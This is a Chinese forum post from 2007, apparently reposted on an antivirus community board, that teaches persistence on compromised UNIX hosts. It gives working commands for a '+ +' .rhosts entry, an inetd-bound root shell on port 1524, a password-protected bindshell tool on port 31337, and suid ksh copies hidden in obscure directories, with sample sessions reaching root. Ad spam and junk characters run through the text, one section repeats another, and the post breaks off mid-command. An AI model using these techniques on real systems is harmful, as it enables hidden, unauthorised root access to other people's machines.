UNIX系统后门的安放和日志的擦除

本主题由水晶王子于 2007-12-9 18:41 设置高亮

OICQ452612285

√♂玄圜♂√

六级士官

神之传奇

积分: 1816
威望: 3446
元宝: 0
铜钱: 561

1楼大中小发表于 2007-12-9 11:26 只看该作者

UNIX系统后门的安放和日志的擦除

当我们通过某种手段控制一个主机时，为了使自己能再次光顾这台计算机，我们通常在这个机器上留下后门，以便我们再次访问。一个做得好的后门，即使在入侵被管理员发现后，仍然能让你再次访问到主机。bbs.duba.net0 M: B- B0 Z( n
本文的意旨是让你学会如何在完全控制系统后保留自己的根用户权限，下面介绍一下我常用的制作后门的手法，不会也不可能覆盖到所有可能的方法，请原谅。
1.Rhosts + + 后门爱毒霸社区-是中国金山毒霸杀毒软件专业社区,提供金山毒霸2009,金山毒霸2008,金山毒霸2008下载,在线杀毒,金山清理专家,专杀工具等产品信息,有流行病毒,木马专业查杀解决方案,为广大金山毒霸用户和电脑安全知识爱好者提供免费的互动社区,爱毒霸社区-成为中国知名杀毒社区,灰鸽子专杀, 做中国杀毒软件最用心社区-bbs.duba.net$ w# r+ R/ Q8 O4 ~$ S z8 H4 s
在连网的Unix机器中，象Rsh和Rlogin这样的服务是基于rhosts文件里的主机名使用简单的认证方法。用户可以轻易的改变设置而不需口令就能进入。入侵者只要向可以访问的某用户的rhosts文件中输入“+ +”，就可以允许任何人从任何地方无须口令便能进入这个帐号。特别当home目录通过NFS向外共享时，入侵者更热中于此，这些帐号也成了入侵者再次侵入的后门。许多人更喜欢使用Rsh，因为它通常缺少日志能力，许多管理员经常检查 “+ +”, 所以入侵者实际上多设置来自网上的另一个帐号的主机名和用户名，从而不易被发现。例如：

# echo + + > /usr/bin/.rhosts # cat /usr/bin/.rhosts
+ +
# rlogin -l bin localhost

爱毒霸社区/ O/ b$ K& A% W; v$ U
将不用输入密码直接用bin帐号rlogin登陆进你的机器。
爱毒霸社区 Q$ H4 ^+ Y& b% Z) [, h
2.Login后门爱毒霸社区-是中国金山毒霸杀毒软件专业社区,提供金山毒霸2009,金山毒霸2008,金山毒霸2008下载,在线杀毒,金山清理专家,专杀工具等产品信息,有流行病毒,木马专业查杀解决方案,为广大金山毒霸用户和电脑安全知识爱好者提供免费的互动社区,爱毒霸社区-成为中国知名杀毒社区,灰鸽子专杀, 做中国杀毒软件最用心社区-bbs.duba.net1 E4 d3 j2 X; o; |# p
在连网的Unix机器中，象Rsh和Rlogin这样的服务是基于rhosts文件里的主机名使用简单的认证方法。用户可以轻易的改变设置而不需口令就能进入。入侵者只要向可以访问的某用户的rhosts文件中输入“+ +”，就可以允许任何人从任何地方无须口令便能进入这个帐号。特别当home目录通过NFS向外共享时，入侵者更热中于此。这些帐号也成了入侵者再次侵入的后门。许多人更喜欢使用Rsh，因为它通常缺少日志能力。许多管理员经常检查 “+ +”，所以入侵者实际上多设置来自网上的另一个帐号的主机名和用户名，从而不易被发现。

一般的rootkit包里都有login后门程序。爱毒霸社区,金山毒霸,金山毒霸2009,金山毒霸2008,金山毒霸2008下载,杀毒软件,杀毒论坛,在线杀毒,毒霸论坛,木马,木马专杀,免费杀毒软件下载,金山毒霸通行证,毒霸,AV终结者,灰鸽子,磁碟机,专杀工具9 |1 s, @1 [6 x/ W# |
3.服务进程后门爱毒霸社区-是中国金山毒霸杀毒软件专业社区,提供金山毒霸2009,金山毒霸2008,金山毒霸2008下载,在线杀毒,金山清理专家,专杀工具等产品信息,有流行病毒,木马专业查杀解决方案,为广大金山毒霸用户和电脑安全知识爱好者提供免费的互动社区,爱毒霸社区-成为中国知名杀毒社区,灰鸽子专杀, 做中国杀毒软件最用心社区-bbs.duba.net$ m. n9 r; }; ?$ K# y0 c, G9 Y
inetd 进程负责监听各个TCP和UDP端口的连接请求，并根据连接请求启动相应的服务器进程。该配置文件 /etc/inetd.conf 很简单，基本形式如下：

(1) (2) (3) (4) (5) (6) (7) shell stream tcp nowait root /usr/sbin/in.rshd in.rshd
login stream tcp nowait root /usr/sbin/in.rlogind in.rlogind
exec stream tcp nowait root /usr/sbin/in.rexecd in.rexecd爱毒霸社区-是中国金山毒霸杀毒软件专业社区,提供金山毒霸2009,金山毒霸2008,金山毒霸2008下载,在线杀毒,金山清理专家,专杀工具等产品信息,有流行病毒,木马专业查杀解决方案,为广大金山毒霸用户和电脑安全知识爱好者提供免费的互动社区,爱毒霸社区-成为中国知名杀毒社区,灰鸽子专杀, 做中国杀毒软件最用心社区-bbs.duba.net) U N. i# W3 V6 O+ N9 |1 `
comsat dgram udp wait root /usr/sbin/in.comsat in.comsat6 S' }8 ?, N2 m- f" Y1 }$ P
talk dgram udp wait root /usr/sbin/in.talkd in.talkd金山毒霸-爱毒霸社区-做中国杀毒软件最用心社区-bbs.duba.net7 {/ \2 @- |3 k* s2 {4 _

8 I/ j+ [9 _1 n. t
1：第一栏是服务名称。服务名通过查询 /etc/services 文件（供 TCP 和 UDP 服务使用）或 portmap 守护进程（供 RPC 服务使用）映射成端口号。RPC（远程过程调用）服务由 name/num 的名字格式和第三栏中的 rpc 标志识别。
2：第二栏决定服务使用的套接口类型：stream、dgram 或 raw。一般说来，stream 用于 TCP 服务，dgram 用于 UDP， raw 的使用很少见。爱毒霸社区-是中国金山毒霸杀毒软件专业社区,提供金山毒霸2009,金山毒霸2008,金山毒霸2008下载,在线杀毒,金山清理专家,专杀工具等产品信息,有流行病毒,木马专业查杀解决方案,为广大金山毒霸用户和电脑安全知识爱好者提供免费的互动社区,爱毒霸社区-成为中国知名杀毒社区,灰鸽子专杀, 做中国杀毒软件最用心社区-bbs.duba.net' e! Q& U6 \7 e- r) f9 N
3：第三栏标识服务使用的通信协议。允许的类型列在 protocols 文件中。协议几乎总是是 tcp 或 udp。RPC 服务在协议类型前冠以 rpc/。
4：如果所说明的服务一次可处理多个请求（而不是处理一个请求后就退出），那么第四栏应置成 wait，这样可以阻止 inetd 持续地派生该守护进程的新拷贝。此选项用于处理大量的小请求的服务。如果 wait 不合适，那么在本栏中填 nowait。
5：第五栏给出运行守护进程的用户名。
6：第六栏给出守护进程的全限定路径名。爱毒霸社区,金山毒霸,金山毒霸2009,金山毒霸2008,金山毒霸2008下载,杀毒软件,杀毒论坛,在线杀毒,毒霸论坛,木马,木马专杀,免费杀毒软件下载,金山毒霸通行证,毒霸,AV终结者,灰鸽子,磁碟机,专杀工具. c6 B& {; {7 J
7：守护进程的真实名字及其参数。如果所要处理的工作微不足道（如不需要用户交互），inetd 守护进程便自己处理。此时第六、七栏只需填上 internal 即可。所以，要安装一个便利的后门，可以选择一个不常被使用的服务，用可以产生某种后门的守护进程代替原先的守护进程。例如，让其添加 UID 0 的帐号，或复制一个 suid shell。
当然我们有一个更简单的方法，# S( @: E/ B2 Q8 Z) A* | A! [9 ?
下面的操作bind root shell 1524端口．

# echo ingreslock stream tcp nowait root /bin/ksh ksh -i > /tmp/.x # /usr/sbin/inetd -s /tmp/.x
# rm -f /tmp/.x
# telnet localhost 1524金山毒霸-爱毒霸社区-做中国杀毒软件最用心社区-bbs.duba.net0 w6 ~; ^- R- h: a5 S
Trying 127.0.0.1...
Connected to localhost. Escape character is ^].7 ^+ {: r# h6 T; I. v5 R; F
#
# id
ksh: id^M: not found
# id;金山毒霸-爱毒霸社区-做中国杀毒软件最用心社区-bbs.duba.net% V6 R; z1 N+ {1 }
uid=1002(gao) gid=1(other) euid=0(root)
ksh: ^M: not found爱毒霸社区,金山毒霸,金山毒霸2009,金山毒霸2008,金山毒霸2008下载,杀毒软件,杀毒论坛,在线杀毒,毒霸论坛,木马,木马专杀,免费杀毒软件下载,金山毒霸通行证,毒霸,AV终结者,灰鸽子,磁碟机,专杀工具; h- d7 w' R& R( Y% @9 S6 P# C, U
# exit;爱毒霸社区; |/ N( K( [6 w: J/ G
Connection closed by foreign host.金山毒霸-爱毒霸社区-做中国杀毒软件最用心社区-bbs.duba.net3 D* l2 R3 d" ?4 a
#

爱毒霸社区-是中国金山毒霸杀毒软件专业社区,提供金山毒霸2009,金山毒霸2008,金山毒霸2008下载,在线杀毒,金山清理专家,专杀工具等产品信息,有流行病毒,木马专业查杀解决方案,为广大金山毒霸用户和电脑安全知识爱好者提供免费的互动社区,爱毒霸社区-成为中国知名杀毒社区,灰鸽子专杀, 做中国杀毒软件最用心社区-bbs.duba.net1 e3 g: _% k! d% \5 z9 o2 t

注意，这样bind的shell在telnet上去后，你要在你想执行的命令后面添加一个" ; "号．即你要执行id命令的输入应为: id;
当然你也可以把ingreslock换成其他服务。具体请查看/etc/services寻找对应的服务名和端口。爱毒霸社区-是中国金山毒霸杀毒软件专业社区,提供金山毒霸2009,金山毒霸2008,金山毒霸2008下载,在线杀毒,金山清理专家,专杀工具等产品信息,有流行病毒,木马专业查杀解决方案,为广大金山毒霸用户和电脑安全知识爱好者提供免费的互动社区,爱毒霸社区-成为中国知名杀毒社区,灰鸽子专杀, 做中国杀毒软件最用心社区-bbs.duba.net6 ]9 y" Z/ g) g7 N+ C8 c
下面为部分/etc/services内容。

# cat /etc/services #ident "@(#)services 1.20 98/07/08 SMI" /* SVr4.0 1.8 */
#
# Network services, Internet style
#* {' q) X7 r7 D' T; T8 z/ u/ J: A
tcpmux 1/tcp
echo 7/tcp金山毒霸-爱毒霸社区-做中国杀毒软件最用心社区-bbs.duba.net  }) {( Y, V" Z. ]" m- P
echo 7/udp* a5 ~2 r% I+ ~/ B1 K
discard 9/tcp sink nullbbs.duba.net: N& Q" c( e# |: Z
discard 9/udp sink null金山毒霸-爱毒霸社区-做中国杀毒软件最用心社区-bbs.duba.net+ x2 f# Z+ @  P. m$ z
systat 11/tcp users
daytime 13/tcp2 b$ f7 Q0 N  Q+ T' s" \+ Y. |
daytime 13/udp
netstat 15/tcp
chargen 19/tcp ttytst source爱毒霸社区-是中国金山毒霸杀毒软件专业社区,提供金山毒霸2009,金山毒霸2008,金山毒霸2008下载,在线杀毒,金山清理专家,专杀工具等产品信息,有流行病毒,木马专业查杀解决方案,为广大金山毒霸用户和电脑安全知识爱好者提供免费的互动社区,爱毒霸社区-成为中国知名杀毒社区,灰鸽子专杀, 做中国杀毒软件最用心社区-bbs.duba.net% I- t& V" H& `; A: b" |
chargen 19/udp ttytst sourcebbs.duba.net- [% W  @. x, Y  J9 @0 h
ftp-data 20/tcp爱毒霸社区-是中国金山毒霸杀毒软件专业社区,提供金山毒霸2009,金山毒霸2008,金山毒霸2008下载,在线杀毒,金山清理专家,专杀工具等产品信息,有流行病毒,木马专业查杀解决方案,为广大金山毒霸用户和电脑安全知识爱好者提供免费的互动社区,爱毒霸社区-成为中国知名杀毒社区,灰鸽子专杀, 做中国杀毒软件最用心社区-bbs.duba.net) o9 q% g+ s- u; D4 V
ftp 21/tcp
telnet 23/tcp爱毒霸社区6 O* k/ g; y0 b) h& ~1 o
smtp 25/tcp爱毒霸社区  b( n7 k9 F3 D
mail time 37/tcp timserver爱毒霸社区* W, ^& s0 q5 J7 |  a
time 37/udp timserver金山毒霸-爱毒霸社区-做中国杀毒软件最用心社区-bbs.duba.net6 m5 U; L; V9 O* C' F# {8 g
name 42/udp nameserver
whois 43/tcp nicname # usually to sri-nicbbs.duba.net+ \. N+ ~1 d  Q& S8 q- O
domain 53/udp
domain 53/tcp爱毒霸社区, C$ V: o! z: N4 O
bootps 67/udp # BOOTP/DHCP server
bootpc 68/udp # BOOTP/DHCP client爱毒霸社区,金山毒霸,金山毒霸2009,金山毒霸2008,金山毒霸2008下载,杀毒软件,杀毒论坛,在线杀毒,毒霸论坛,木马,木马专杀,免费杀毒软件下载,金山毒霸通行证,毒霸,AV终结者,灰鸽子,磁碟机,专杀工具' B; h. Z6 q* X! [' B+ A3 H6 v" i

爱毒霸社区,金山毒霸,金山毒霸2009,金山毒霸2008,金山毒霸2008下载,杀毒软件,杀毒论坛,在线杀毒,毒霸论坛,木马,木马专杀,免费杀毒软件下载,金山毒霸通行证,毒霸,AV终结者,灰鸽子,磁碟机,专杀工具* v% ?( z: s0 H# M# [' H
爱毒霸社区-是中国金山毒霸杀毒软件专业社区,提供金山毒霸2009,金山毒霸2008,金山毒霸2008下载,在线杀毒,金山清理专家,专杀工具等产品信息,有流行病毒,木马专业查杀解决方案,为广大金山毒霸用户和电脑安全知识爱好者提供免费的互动社区,爱毒霸社区-成为中国知名杀毒社区,灰鸽子专杀, 做中国杀毒软件最用心社区-bbs.duba.net3 I0 c' c) j. O
4.port bind suid Shell 后门金山毒霸-爱毒霸社区-做中国杀毒软件最用心社区-bbs.duba.net) v! t4 n! o3 B! w5 I; b4 Z4 C% G8 w
入侵者可能在任意端口bind suid Shell后门。许多情况下,他们用口令进行保护以免管理员连接上后立即看到是shell访问。管理员可以用netstat命令查看当前的连接状态, 那些端口在侦听, 目前连接的来龙去脉。
我提供的压缩包door.zip里有一个ekobackdoor-v1.1.tar，为linux下的bindshell程序包．大家可以自己编译一下．
方法为，bbs.duba.net$ ^- P/ T( F- B1 i! T$ L1 n' u) U2 u
修改ekobdoor.c
查找
#define PASSWORD "ekorulez"
把"ekorulez" 改成你要的密码。
比如爱毒霸社区-是中国金山毒霸杀毒软件专业社区,提供金山毒霸2009,金山毒霸2008,金山毒霸2008下载,在线杀毒,金山清理专家,专杀工具等产品信息,有流行病毒,木马专业查杀解决方案,为广大金山毒霸用户和电脑安全知识爱好者提供免费的互动社区,爱毒霸社区-成为中国知名杀毒社区,灰鸽子专杀, 做中国杀毒软件最用心社区-bbs.duba.net: I5 P+ Z# ?6 E B) I" T
#define PASSWORD "cnhonker"bbs.duba.net2 C' R$ d! u3 F, {
把ekobackdoor-v1.1.tar解压然后make就可以了。" n; E& O3 u9 A" C8 c
具体使用方法为：爱毒霸社区,金山毒霸,金山毒霸2009,金山毒霸2008,金山毒霸2008下载,杀毒软件,杀毒论坛,在线杀毒,毒霸论坛,木马,木马专杀,免费杀毒软件下载,金山毒霸通行证,毒霸,AV终结者,灰鸽子,磁碟机,专杀工具, Y; P, u1 |5 S8 E
# ./ekobdoor [opcion] [argumento]爱毒霸社区2 u5 H) g0 u1 _. e
下面为不用输入密码的

# ./ekobdoor -b 31337 c:\ telnet 200.45.0.115 31337) Y7 w: a {' ?
Trying 200.45.0.115...( l+ j! q1 l. U, H/ v
Connected to 200.45.0.115.
Escape character is ^].
#爱毒霸社区" k* ?6 ]6 t, y

下面为需要输入密码的.金山毒霸-爱毒霸社区-做中国杀毒软件最用心社区-bbs.duba.net+ w5 A$ T E# j6 s) V" r8 ~

# ./ekobdoor -s 31337 c:\ telnet 200.45.0.115 31337
Trying 200.45.0.115...
Connected to 200.45.0.115.爱毒霸社区-是中国金山毒霸杀毒软件专业社区,提供金山毒霸2009,金山毒霸2008,金山毒霸2008下载,在线杀毒,金山清理专家,专杀工具等产品信息,有流行病毒,木马专业查杀解决方案,为广大金山毒霸用户和电脑安全知识爱好者提供免费的互动社区,爱毒霸社区-成为中国知名杀毒社区,灰鸽子专杀, 做中国杀毒软件最用心社区-bbs.duba.net1 h8 l# q2 Q- U# j! l: c3 G4 ^
Escape character is ^].) V$ ?$ B1 Q7 i
cnhonker --->输入密码.# K& r/ b: h6 w
#爱毒霸社区; c2 ]3 [0 Q- K# l0 \2 }

爱毒霸社区9 Q3 [. t( T" `8 S: {8 x

这里的31337你可以改成你想要的端口.
当然它还有更多其他功能.具体你用 -h 查看
#./ekobdoor -h金山毒霸-爱毒霸社区-做中国杀毒软件最用心社区-bbs.duba.net, w& P$ ~/ v. j! D$ t$ C
5.suid shell
在 /tmp 或者其他的目录下放置 suid shell。以后只要你运行这个程序，就会轻易得到根用户权限。
#cp /bin/ksh /tmp/.shbbs.duba.net* e8 W6 O2 j6 _, ^, w8 o
#chown root:root /tmp/.sh
#chmod +s /tmp/.sh金山毒霸-爱毒霸社区-做中国杀毒软件最用心社区-bbs.duba.net# x: ^) s( d- I! U9 ? A% }+ V
当你运行/tmp/.sh时，bbs.duba.net1 }1 t) z% p7 x
这里我们用ksh shell是因为ksh 可以suid.换成其他的shell也许可能不行，具体看各个主机的情况而定．一般我们使用ksh．我们使用的溢出程序用来获得root权限的，也一般是溢出后执行/bin/ksh。爱毒霸社区-是中国金山毒霸杀毒软件专业社区,提供金山毒霸2009,金山毒霸2008,金山毒霸2008下载,在线杀毒,金山清理专家,专杀工具等产品信息,有流行病毒,木马专业查杀解决方案,为广大金山毒霸用户和电脑安全知识爱好者提供免费的互动社区,爱毒霸社区-成为中国知名杀毒社区,灰鸽子专杀, 做中国杀毒软件最用心社区-bbs.duba.net& u& _1 ^- M/ z. ?) |' g

$id uid=1002(oracle) gid=1(other)
$/tmp/.sh
#金山毒霸-爱毒霸社区-做中国杀毒软件最用心社区-bbs.duba.net' |0 U4 q' ~3 e( V
#idbbs.duba.net, p ?3 ]7 w6 {7 b
uid=1002(oracle) gid=1(other) euid=0(root) egid=0(root)爱毒霸社区- T, n c* M, L; R: P& r

我们又是root了．爱毒霸社区,金山毒霸,金山毒霸2009,金山毒霸2008,金山毒霸2008下载,杀毒软件,杀毒论坛,在线杀毒,毒霸论坛,木马,木马专杀,免费杀毒软件下载,金山毒霸通行证,毒霸,AV终结者,灰鸽子,磁碟机,专杀工具$ C% { K. a6 I# n
当然，为了更加隐蔽，我们不能把suid shell 放在/tmp
因为它是很容易被发现的．
我们应该放在深层的目录里面．
比如： p4 X; c( s5 o
/usr/X11/include/X11/bbs.duba.net( D- ?9 W2 I: A2 h2 y
或者
/usr/lib/
等等爱毒霸社区,金山毒霸,金山毒霸2009,金山毒霸2008,金山毒霸2008下载,杀毒软件,杀毒论坛,在线杀毒,毒霸论坛,木马,木马专杀,免费杀毒软件下载,金山毒霸通行证,毒霸,AV终结者,灰鸽子,磁碟机,专杀工具, n7 B2 @( ^: f* e0 f: s; }
通常我做的是：

# mkdir /usr/lib/lib/ mkdir /usr/lib/lib/... # cp /bin/ksh /usr/lib/lib/.../lib
# chown root:sys /usr/lib/lib/.../li金山毒霸-爱毒霸社区-做中国杀毒软件最用心社区-bbs.duba.net# ~. d2 ^+ e& y5 }2 b

虽然是菜鸟`````；但,总会成大虾的!
对于国产的杀软，请大家用客观的眼光看，而不是敌对的态度！

TOP

‹‹ 上一主题 | 下一主题 ››